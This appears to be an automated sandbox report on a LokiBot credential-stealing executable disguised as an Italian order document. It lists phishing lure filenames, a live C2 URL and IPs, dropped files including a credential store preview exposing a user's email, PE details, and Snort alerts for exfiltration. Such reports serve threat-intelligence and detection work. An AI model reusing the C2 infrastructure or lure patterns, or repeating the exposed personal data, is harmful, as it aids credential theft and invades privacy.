	Progetto Plastisavio S.p.A. 19_10_2021_pdf.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php
	Schenker Italiana S.p.A. CW305.exe	Get hash	malicious	Browse	farmanat.ro/farm/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
farmanat.ro	ATTACHMENT 6637268#Hydro tech BG_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	Richiesta di quotazione ISCOTRANS SPA Nr.5653.exe	Get hash	malicious	Browse	176.223.209.128
	Nr_ SOFIA_587646211152021.exe	Get hash	malicious	Browse	176.223.209.128
	SOFIA_BG PROJECT Nr_534427355.exe	Get hash	malicious	Browse	176.223.209.128
	Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exe	Get hash	malicious	Browse	176.223.209.128
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	176.223.209.128
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	176.223.209.128
	Progetto Plastisavio S.p.A. 19_10_2021_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	Schenker Italiana S.p.A. CW305.exe	Get hash	malicious	Browse	176.223.209.128
	SecuriteInfo.com.__vbaHresultCheckObj.9268.exe	Get hash	malicious	Browse	176.223.209.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AfrihostZA	oQANZnrt9d	Get hash	malicious	Browse	169.35.135.240
	Akiru.arm7	Get hash	malicious	Browse	169.66.132.25
	Akiru.arm	Get hash	malicious	Browse	169.121.9.247
	HLiQSIwlY7	Get hash	malicious	Browse	169.79.178.207
	aZsszSGIEV	Get hash	malicious	Browse	169.127.19.203
	2Mxp7Z86k3	Get hash	malicious	Browse	169.222.34.97
	sora.x86	Get hash	malicious	Browse	169.74.42.79
	c0az1l4js3001lsk4xd9n.x86-20211124-0850	Get hash	malicious	Browse	169.166.190.64
	x86_64-20211124-0649	Get hash	malicious	Browse	169.74.152.242
	arm-20211124-0649	Get hash	malicious	Browse	169.168.89.229
	sora.arm-20211123-2050	Get hash	malicious	Browse	169.222.83.73
	zxIlLJKauk	Get hash	malicious	Browse	169.114.115.195
	6PZ6S2YGPB	Get hash	malicious	Browse	169.164.169.154
	DkTfOvsiCR	Get hash	malicious	Browse	169.82.147.51
	RpcSecurity.arm	Get hash	malicious	Browse	169.184.22.186
	KKveTTgaAAsecNNaaaa.x86-20211122-0650	Get hash	malicious	Browse	169.107.15.33
	eh.x86	Get hash	malicious	Browse	165.255.192.210
	g2ZhDilVO3	Get hash	malicious	Browse	169.225.110.154
	TikNgaeW5G	Get hash	malicious	Browse	169.66.107.25
	Hilix.arm	Get hash	malicious	Browse	169.76.1.149
ROHOSTWAY-ASRO	ATTACHMENT 6637268#Hydro tech BG_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	Richiesta di quotazione ISCOTRANS SPA Nr.5653.exe	Get hash	malicious	Browse	176.223.209.128
	Nr_ SOFIA_587646211152021.exe	Get hash	malicious	Browse	176.223.209.128
	SOFIA_BG PROJECT Nr_534427355.exe	Get hash	malicious	Browse	176.223.209.128
	Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exe	Get hash	malicious	Browse	176.223.209.128
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	176.223.209.128
	PO_W4420211025#BULGARIA SAINT GOBAIN.exe	Get hash	malicious	Browse	176.223.209.128
	Progetto Plastisavio S.p.A. 19_10_2021_pdf.exe	Get hash	malicious	Browse	176.223.209.128
	Schenker Italiana S.p.A. CW305.exe	Get hash	malicious	Browse	176.223.209.128
	SecuriteInfo.com.__vbaHresultCheckObj.9268.exe	Get hash	malicious	Browse	176.223.209.128
	118937279-112134-sanlccjavap0003-60.exe	Get hash	malicious	Browse	176.223.208.10
	171021434-045230-sanlccjavap0003-10004.exe	Get hash	malicious	Browse	176.223.208.10
	6fbb325e_by_Libranalysis.exe	Get hash	malicious	Browse	176.223.208.10
	PE001163862782-11737929013-93891812PDF.exe	Get hash	malicious	Browse	176.223.208.10
	Em anexo esta a Fatura Proforma.exe	Get hash	malicious	Browse	176.223.209.5
	69P.O 2315_PDF.exe	Get hash	malicious	Browse	84.40.5.143
	40INVOICE BTS_Pdf.exe	Get hash	malicious	Browse	84.40.5.143
	17Bill of lading Status_pdf.exe	Get hash	malicious	Browse	84.40.5.143

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	mal1.html	Get hash	malicious	Browse	197.242.150.64
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	197.242.150.64
	DOC5629.htm	Get hash	malicious	Browse	197.242.150.64
	Racun je u prilogu.exe	Get hash	malicious	Browse	197.242.150.64
	exe.exe	Get hash	malicious	Browse	197.242.150.64
	INF-BRdocsx.NDVDELDKRS.msi	Get hash	malicious	Browse	197.242.150.64
	2GEg45PlG9.exe	Get hash	malicious	Browse	197.242.150.64
	cJ2wN3RKmh.exe	Get hash	malicious	Browse	197.242.150.64
	J73PTzDghy.exe	Get hash	malicious	Browse	197.242.150.64
	fkYZ7hyvnD.exe	Get hash	malicious	Browse	197.242.150.64
	xzmHphquAP.exe	Get hash	malicious	Browse	197.242.150.64
	R0xLHA2mT5.exe	Get hash	malicious	Browse	197.242.150.64
	Rats4dIOmA.exe	Get hash	malicious	Browse	197.242.150.64
	XP-SN-7843884.htm	Get hash	malicious	Browse	197.242.150.64
	XP-SN-8324655.htm	Get hash	malicious	Browse	197.242.150.64
	new-1834138397.xls	Get hash	malicious	Browse	197.242.150.64
	1.htm	Get hash	malicious	Browse	197.242.150.64
	FACTURAS.exe	Get hash	malicious	Browse	197.242.150.64
	new-1179494065.xls	Get hash	malicious	Browse	197.242.150.64
	Arrival Notice, CIA Awb Inv Form.pdf.exe	Get hash	malicious	Browse	197.242.150.64

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec Download File
Process:	C:\Windows\System32\lsass.exe
File Type:	data
Category:	dropped
Size (bytes):	3656
Entropy (8bit):	7.0471426164335735
Encrypted:	false
SSDEEP:	48:UOt6arrbUSpRRAr24LrPMJvPdkbr0Cn4mroYbkM6CRrlWycl9rfkTJNrrN8euJMQ:UO8abFpRRG24fgPd6dD2GMsl53zqLA8
MD5:	DF46EAA3E0822E1F26163A47DD2EBC88
SHA1:	74C5CD5E0A656E2B17567486D8893A41D6FC1837
SHA-256:	2DB1C00E04388BD8BDD7263D10200FB52F7F34078733B4B722BF142B0D9E7E19
SHA-512:	B316793DCD4B612D09E34DF00E27DCAFA0E6452913B1DC7A43D5483C259DADA9FA11E32F6FA42D32A460EE221D25A82B2888C02B0060E7BBF6810A0229A118E1
Malicious:	false
Reputation:	low
Preview:	0...H.................0.............................L.e.g.a.c.y.G.e.n.e.r.i.c.:.t.a.r.g.e.t.=.M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m.......(...P.e.r.s.i.s.t.e.d.C.r.e.d.e.n.t.i.a.l.......6...s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m...........D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.0...................z..O........$...I.AP...i&...........f...... ....}3..+....i.a...-....JEj...d<~............ ........K%..D.c<.P............j. ...zp.@..e.s.Wes1J..B..G.U[....0O%9l...U..F..vO..<.......<..sn.8j3...4?.Be.i.BqM.q^..\|x.....D..s).^o....[,.....D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.1.......1.YY..VRnE...%...m....Fa...?...2KC...Z.w...`+.&..\^.....[...*6M0.V.9....N..S..\|.....,....;...i.v]y....;...E.R..I]....C.....z..%.....?...].5..p..<.... .....>....bC.\|...\|..B..Q0_f).^.k.Nt#e..[...iv+G.x.T.z.~...S.....t..`.....m....\.iq........D...M.i.c.r.o.s.o.

C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMP Download File
Process:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.5460794479699351
Encrypted:	false
SSDEEP:	96:kOtJyg4D7OKBqQOtJyg4D1DDPwYDPXxJXf6nZV4XoB:1KD7OKAJKD1DDPwYDPXxJXf6nZV4XoB
MD5:	A10173F2BC7809BD9C218B204F91B9B5
SHA1:	CCC33C4FF5908D771A921E81FA6DEC9E83BF9399
SHA-256:	9D569DF219A76092E36A090729EF451275255D21A7B7FA9BEEA8431DF88906D8
SHA-512:	F2FB87D14882D23D9F49F4AE31D179CE083C0D7F2C87755C68600CDBB8A48E06E02DBFD0FCF42BB7611590FDF03EB4FDA0B5FBB530A1DB4AAB5487099A495FDB
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb Download File
Process:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:7:7
MD5:	4F1717C9B5ACF6604D800FE07A8D320F
SHA1:	151524FA23C0F30AB06C0DA0BEAFDB77ABAA3739
SHA-256:	B2B5DAEAC1A532BA9D1086A6CFB21F7CD9381D4FFAFB12274E5248D108F0BDC6
SHA-512:	DA07F4DEB58DFBD694F4A7D2D54D154B78E507EC6477F1DB0CA6922F25E5E3FA0C0FB6FC78D1FA584FC883754D3FCA9F567207E61CE8C3851C79D5AB42C2A258
Malicious:	false
Reputation:	low
Preview:	.@h.

C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck Download File
Process:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb Download File
Process:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.1262763721961973
Encrypted:	false
SSDEEP:	3:/lSllIEXln:AWE1
MD5:	D69FB7CE74DAC48982B69816C3772E4E
SHA1:	B1C04CDB2567DC2B50D903B0E1D0D3211191E065
SHA-256:	8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
SHA-512:	7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.174630404591659
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ORDINE + DDT A.M.F SpA.exe
File size:	164928
MD5:	f5423b7a89876044078cbb68db883af8
SHA1:	24c550c47d26090f298fea030d7fb890c94737a5
SHA256:	68a315123349444d30fed12643a7be20eb003531a4b95d0db800fb765449037d
SHA512:	a1e0da217c0a383878405f53b7318316d87fa7483831429ef50973a526bf160baa855ac2b7853dfe95b15265aee3bba9044ad04ee4319ab41cb2fdb1cd2cf166
SSDEEP:	3072:9cqN5FpupBqUudn4Qw6cOOxQnLC6hpA7VHACd:xN5mpBHAYxQnLn4D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......O................. ...`......@........0....@

File Icon


Icon Hash:	e5c1e079b0dcdc3c

Static PE Info

General
Entrypoint:	0x401640
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4FF98A07 [Sun Jul 8 13:24:23 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90425c3cfb1918f16a4ffb8047a25e88

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	25/11/2021 06:31:27 25/11/2022 06:31:27
Subject Chain	E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
Version:	3
Thumbprint MD5:	1675B0681F6E08F88C72FD3302E50FD9
Thumbprint SHA-1:	DDEB96699987B30C7A4E263EC2B1CE4BED20032D
Thumbprint SHA-256:	490EABAB012CB43983C62C20A02D579B84FABA9ADF4734E32E4330690D5139D1
Serial:	00

Entrypoint Preview

Instruction
push 004016F4h
call 00007F3B60A66FF3h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi-6A393297h], cl
pop ss
mov dword ptr [ecx-75h], ecx
or ecx, dword ptr [esi-40h]
dec esi
out dx, al
iretd
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
inc edx
add byte ptr [esi], al
push eax
add dword ptr [ecx], 46h
popad
je 00007F3B60A67076h
insb
imul esp, dword ptr [edi+65h], 1C000073h
insb
hlt
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], al
add al, ah
aaa
inc eax
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [eax+ebp+40h], ch
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [eax+ebp], dl
inc eax
add byte ptr [edi], al
add byte ptr [eax], al
add al, al
daa
inc eax
add byte ptr [ecx], al
add byte ptr [eax+eax], al
inc eax
and eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x226f4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x22a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x27000	0x1440
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x118	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x21bcc	0x22000	False	0.385268267463	data	6.40485948077	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x23000	0x20b4	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x26000	0x22a4	0x3000	False	0.194580078125	data	3.74537367217	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x27e84	0x420	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x27a48	0x43c	ASCII text, with CRLF line terminators	English	United States
CUSTOM	0x276c6	0x382	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x2759e	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x27036	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x26d4e	0x2e8	data
RT_ICON	0x264a6	0x8a8	data
RT_GROUP_ICON	0x26468	0x3e	data
RT_VERSION	0x26230	0x238	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	HYDROCHELIDON
FileVersion	1.00
ProductName	Daisy chain
ProductVersion	1.00
FileDescription	Daisy chain
OriginalFilename	HYDROCHELIDON.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Chinese	Taiwan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-10:47:51.302644	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62242	1.1.1.1	192.168.11.20
11/25/21-10:47:51.432888	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62242	9.9.9.9	192.168.11.20
11/25/21-10:47:51.433091	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.11.20	9.9.9.9
11/25/21-10:47:54.204528	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49817	80	192.168.11.20	176.223.209.128
11/25/21-10:47:54.204528	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49817	80	192.168.11.20	176.223.209.128
11/25/21-10:47:54.204528	TCP	2025381	ET TROJAN LokiBot Checkin	49817	80	192.168.11.20	176.223.209.128
11/25/21-10:47:54.204528	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49817	80	192.168.11.20	176.223.209.128
11/25/21-10:48:00.994992	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49821	80	192.168.11.20	176.223.209.128
11/25/21-10:48:00.994992	TCP	2025381	ET TROJAN LokiBot Checkin	49821	80	192.168.11.20	176.223.209.128
11/25/21-10:48:01.719256	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49822	80	192.168.11.20	176.223.209.128
11/25/21-10:48:01.719256	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49822	80	192.168.11.20	176.223.209.128
11/25/21-10:48:01.719256	TCP	2025381	ET TROJAN LokiBot Checkin	49822	80	192.168.11.20	176.223.209.128
11/25/21-10:48:01.719256	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49822	80	192.168.11.20	176.223.209.128
11/25/21-10:48:02.549129	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49823	80	192.168.11.20	176.223.209.128
11/25/21-10:48:02.549129	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49823	80	192.168.11.20	176.223.209.128
11/25/21-10:48:02.549129	TCP	2025381	ET TROJAN LokiBot Checkin	49823	80	192.168.11.20	176.223.209.128
11/25/21-10:48:02.549129	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49823	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.269523	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49824	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.269523	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49824	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.269523	TCP	2025381	ET TROJAN LokiBot Checkin	49824	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.269523	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49824	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.921018	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49825	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.921018	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49825	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.921018	TCP	2025381	ET TROJAN LokiBot Checkin	49825	80	192.168.11.20	176.223.209.128
11/25/21-10:48:03.921018	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49825	80	192.168.11.20	176.223.209.128
11/25/21-10:48:04.640364	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49826	80	192.168.11.20	176.223.209.128
11/25/21-10:48:04.640364	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49826	80	192.168.11.20	176.223.209.128
11/25/21-10:48:04.640364	TCP	2025381	ET TROJAN LokiBot Checkin	49826	80	192.168.11.20	176.223.209.128
11/25/21-10:48:04.640364	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49826	80	192.168.11.20	176.223.209.128
11/25/21-10:48:05.424332	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49828	80	192.168.11.20	176.223.209.128
11/25/21-10:48:05.424332	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.11.20	176.223.209.128
11/25/21-10:48:05.424332	TCP	2025381	ET TROJAN LokiBot Checkin	49828	80	192.168.11.20	176.223.209.128
11/25/21-10:48:05.424332	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49828	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.230046	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.230046	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.230046	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.230046	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49844	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.992097	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49845	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.992097	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49845	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.992097	TCP	2025381	ET TROJAN LokiBot Checkin	49845	80	192.168.11.20	176.223.209.128
11/25/21-10:48:06.992097	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49845	80	192.168.11.20	176.223.209.128
11/25/21-10:48:07.734356	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49846	80	192.168.11.20	176.223.209.128
11/25/21-10:48:07.734356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49846	80	192.168.11.20	176.223.209.128
11/25/21-10:48:07.734356	TCP	2025381	ET TROJAN LokiBot Checkin	49846	80	192.168.11.20	176.223.209.128
11/25/21-10:48:07.734356	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49846	80	192.168.11.20	176.223.209.128
11/25/21-10:48:08.418319	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49847	80	192.168.11.20	176.223.209.128
11/25/21-10:48:08.418319	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49847	80	192.168.11.20	176.223.209.128
11/25/21-10:48:08.418319	TCP	2025381	ET TROJAN LokiBot Checkin	49847	80	192.168.11.20	176.223.209.128
11/25/21-10:48:08.418319	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49847	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.107461	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49848	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.107461	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49848	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.107461	TCP	2025381	ET TROJAN LokiBot Checkin	49848	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.107461	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49848	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.857430	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49849	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.857430	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49849	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.857430	TCP	2025381	ET TROJAN LokiBot Checkin	49849	80	192.168.11.20	176.223.209.128
11/25/21-10:48:09.857430	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49849	80	192.168.11.20	176.223.209.128
11/25/21-10:48:10.692074	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49850	80	192.168.11.20	176.223.209.128
11/25/21-10:48:10.692074	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49850	80	192.168.11.20	176.223.209.128
11/25/21-10:48:10.692074	TCP	2025381	ET TROJAN LokiBot Checkin	49850	80	192.168.11.20	176.223.209.128
11/25/21-10:48:10.692074	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49850	80	192.168.11.20	176.223.209.128
11/25/21-10:48:11.469665	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49851	80	192.168.11.20	176.223.209.128
11/25/21-10:48:11.469665	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49851	80	192.168.11.20	176.223.209.128
11/25/21-10:48:11.469665	TCP	2025381	ET TROJAN LokiBot Checkin	49851	80	192.168.11.20	176.223.209.128
11/25/21-10:48:11.469665	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49851	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.137740	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.137740	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.137740	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.137740	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49852	80	192.168.11.20	176.223.209.128
11/25/21-10:48:12.876249	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.11.20	176.223.209.128
